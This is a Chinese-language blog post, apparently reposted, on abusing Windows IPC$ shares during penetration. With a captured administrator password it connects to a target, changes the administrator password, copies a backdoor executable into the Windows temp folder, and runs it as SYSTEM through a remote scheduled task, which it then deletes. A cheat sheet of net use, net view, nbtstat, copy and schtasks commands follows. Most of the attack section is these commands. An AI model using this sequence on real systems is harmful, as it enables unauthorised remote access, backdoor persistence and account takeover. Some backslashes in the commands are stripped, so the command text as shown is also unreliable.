IPC$渗透使用

  • A+
所属分类:安全文章

作者:素时听风         


   IPC$渗透使用                

简介

IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。

使用条件

1.开放了139、445端口;
2.目标开启ipc$文件共享;
3.获取用户账号密码。

测试过程

此测试前提是获取了ipc$,
这里测试的时候得到的权限是system,然后创建了一个admin账户,给了administrators权限,但无法复制文件过去,于是就改了administrator账户密码(实战中不建议更改,可读取管理密码后再用读到的密码)。
更改密码:net user administrator "[email protected]"

  • 1.连接目标ipc$,将后门复制到目标机器上

net use \193.168.1.12ipc$ /user:administrator "1qaz@WSX"copy plugin_update.exe \193.168.1.12c$windowstempplugin_update.exe

IPC$渗透使用

  • 2.创建自动任务,执行上传的后门程序


# 查看目标机器时间net time \193.168.1.12# 创建该时间之后的某个时刻自动执行任务,任务名 plugin_updateschtasks /create /tn "plugin_update" /tr c:windowstempplugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"# 如果不想等,可以立即运行后门程序schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"# 删除创建的任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

IPC$渗透使用

接收端的目标机器已上线。
IPC$渗透使用

常用命令


# 1.连接net use \193.168.1.12ipc$ /user:administrator "1qaz@WSX"# 2.查看连接情况net use# 3.查看目标主机共享资源net view \193.168.1.12# 4.查看目标主机时间net time \193.168.1.12# 5.查看目标主机的NetBIOS用户(自己本机也需开启)nbtstat -A 193.168.1.12# 6.删除连接net use \193.168.1.12ipc$ /del# 7.文件上传下载copy plugin_update.exe \193.168.1.12c$windowstempplugin_update.exe   (上传到目标的:cwindowstemp目录下)copy \127.0.0.1c$test.exe c:(下载到本地c盘下)# 8.创建计划任务schtasks /create /tn "plugin_update" /tr c:windowstempplugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"# 9.立即执行计划任务schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"# 10.删除计划任务schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX
作者:素时听风出处:https://www.cnblogs.com/sstfy/p/10414680.html版权:本文采用「署名-非商业性使用-相同方式共享 4.0 国际」知识共享许可协议进行许可。
部分文章为本人工作、学习中所查阅资料时觉得受益很大,并转载分享。并注明了作者与原文链接。

如果觉得文章对你有帮助,请支持下点击右下角“在看”

IPC$渗透使用

本文始发于微信公众号(LemonSec):IPC$渗透使用

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: